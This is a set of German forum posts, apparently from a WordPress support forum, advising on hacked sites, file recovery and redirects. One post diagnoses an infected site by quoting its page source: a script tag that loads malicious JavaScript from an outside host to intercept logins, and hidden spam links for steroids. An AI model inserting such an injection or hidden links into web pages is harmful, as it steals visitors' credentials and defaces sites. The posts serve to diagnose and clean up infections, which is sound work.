Beiträge von b3317133

    Jemand mit entsprechender WordPress Erfahrung kann selbstverständlich herausfinden, was sich wo eingenistet hat. Die Fähigkeit, Veränderungen gleichwelcher Art herausfinden zu können, wird jederzeit für jeden Website benötigt. Das ist eine elementare Grundlage.

    Oft werden für Hacks Lücken in Themes/Plugins genutzt, für die es keine ausstehenden Updates (mehr) gibt. Nur weil keine Updates angezeigt werden, heisst das nicht, dass man ein aktuelles und sicheres System betreibt, das ist ein weit verbreiteter Trugschluss. Daher ist eine eingehende Analyse nötig. Alles andere ist halbherzig und nicht seriös.

    Und natürlich ist die aktuelle Seite bei Bekanntwerden eines Hacks sofort abzuschalten:

    Erneutes Aufrufen oder Einloggen in die alte gehackte Seite darf dabei nicht mehr möglich sein.

    1. Am Wichtigsten wäre es, zunächst anhand der aktuell verseuchten Dateien, Datenbank und Server-Logs die für den/die Hack(s) genutzte(n) Lücke(n) zu ermitteln, damit das nicht wieder passiert.
    2. Danach kann man entweder zusammen mit jemandem mit WordPress Erfahrung, die über das Installieren von "Sicherheits-Plugins" und dem Anklicken von Updates hinaus geht, die aktuelle Installation bereinigen oder unter Berücksichtigung der Erkenntnisse aus 1., also dem Weglassen von Theme, Plugins, externe Einbindungen, wasauchimmer die Lücke war, die Seite mit einem frischen WordPress neu aufbauen und die alten Beiträge/Seiten manuell direkt aus der Datenbank auslesen und unter eingehender Prüfung der Inhalte in die neue Seite einpflegen. Erneutes Aufrufen oder Einloggen in die alte gehackte Seite darf dabei nicht mehr möglich sein.


    Siehe auch allgemeines Vorgehen bei einem Hack oben verlinkt.

    Die Seite ist aktuell gehackt. Ganz zu Beginn des HTML Quelltextes wird ein bösartiges JavaScript (Virustotal.com) eingebunden, das den Login belauscht und dann ggf. auch z.B. auf andere Seiten weiterleitet:

    HTML
    <script src='https://print.legendarytable.com/news.js?v=6.3.2' type='text/javascript'></script><!DOCTYPE html>
    <html dir="ltr" lang="de-DE"
        prefix="og: https://ogp.me/ns#" >
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="profile" href="http://gmpg.org/xfn/11">
    ...


    Ganz am Ende des HTML Quelltextes werden Spam Links eingefügt:

    Code
    ...
    <span style="display:block; font-size:0;height:0;">Charr vs. Oquendo canceled with deal unsigned <a href="http://uk-roids.com/" title="buy anabolic steroids uk online">buy anabolic steroids uk online</a> cash flow on steroids: why companies cheat
    </span></body>
    </html>


    Von weiterem Befall an anderen Stellen ist auszugehen.

    Das allgemeine Vorgehen bei einem Hack ist z.B. hier beschrieben, das könntest Du mit jemandem mit WordPress Erfahrung bei Dir im näheren Umfeld zusammen durchgehen.

    Dabei am Wichtigsten wäre, die für den Hack genutzte(n) Lücke(n) zu ermitteln, damit das nicht wieder passiert.

    Der Code würde wie gewünscht funktionieren, wenn man alle im o.g. Beispiel genannten Überprüfungen der Ergebnisse der API-Aufrufe auch prüfen würde und nur dann den Meta Tag ausgibt, wenn alles passt. Zudem siehe Hinweis zu 'large' oben.

    Mit welcher genauen URL testest Du Deinen Code? Schau den HTML-Quelltext der getesteten URL an, evtl. wird Dein Code wegen der Bedingungen is_single() bzw. is_page() gar nicht ausgegeben. Derzeit kann man Deinen Code nicht testen, er ist offenbar nicht aktiv.

    Bei meiner Recherche bin ich "nur" auf Plugins gestoßen die zwar den Redirect machen, allerdings innerhalb der URL weiterleiten, ..


    Auf welche Plugins genau? Evtl. kann man die anders einrichten? Oder damit als Workaround einen Order /ch/ anlegen und darin einen .htaccess Redirect zu .ch und umgekehrt. Oder generell eine .htaccess Weiche über den Accept-Language Header des Browsers. Es gibt viele Möglichkeiten.

    • Welche genauen Seiten und/oder Beiträge wurden dort erstellt? Von welchem WordPress Benutzer? Screenshots?
    • Mehrere "Sicherheits" Plugins mit ähnlicher Zielrichtung gleichzeitig zu betreiben, funktioniert oft nicht, da sie sich in die Quere kommen können.


    Tipp am Rande: Über die WordPress Suche mit "login" findet man bei Dir eine Login Seite, die aber derzeit nicht funktioniert ist, da das ProfilePress Plugin offenbar inaktiv ist.

    Hinweis am Rande: Dieser Thread ist uralt, der angesprochene Benutzer war zuletzt vor ca. 1,5 Jahren hier, mal sehen, ob er sich nochmal meldet. Jetzt vorhandene Funktionen von Plugins waren damals ggf. noch völlig andere. Die Frage an sich sollte sich mit dem Lesen der Dokumentation des Plugins erledigt haben.

    Normalerweise sollte WordPress einen entspr. Dialog starten, wenn wp-config.php nicht vorhanden ist. Wenn das nicht der Fall ist, könnte es sein, dass in Deinem Fall weitere nicht genannte Dateien fehlerhaft/zerstört sind.

    Der theoretische Wiederherstellungsweg würde ansonsten so beginnen:

    1. Erstelle eine Kopie der Datei wp-config-sample.php mit neuem Dateinamen wp-config.php
    2. Trage Deine Datenbank Zugangsdaten bei den vier DB_NAME, DB_USER, DB_PASSWORD und DB_HOST Einträgen dort ein, siehe auch hier
    3. Ersetze den Codeblock mit den AUTH, KEY, SALT Einträgen mit einem hier neu generierten Block
    4. Lade diese Datei als wp-config.php per FTP hoch


    Die restlichen drei genannten Dateien sind für einen normalen Betrieb von WordPress nicht relevant. Der Ordner plugins/wp-dest/ ist vermutlich ein Trojaner und sollte komplett gelöscht werden.

    Um ggf. sonstige Dateien des WordPress Core zu reparieren, lade Dir die .zip Datei der bisher bei Dir verwendeten WordPress Version hier herunter, die Versionsnummer findest Du in Deiner Datei wp-includes/version.php, und daraus dann alle Dateien im Hauptverzeichnis (dort wo auch wp-config-sample.php zu finden ist) und die kompletten beiden Ordner wp-admin und wp-includes per FTP hoch.

    Dann könnte die aktuelle Installation wieder funktionieren, es ist aber vermutlich so, dass Plugins und Themes auch befallen sind bzw. weiterhin die Lücken aufweisen, durch die der Hack ermöglicht wurde und alles wieder passiert.

    Generell suche Dir jemanden in Deinem Umfeld, der sich mit WordPress auskennt und lasse Dich bei diesen technischen Dingen unterstützen.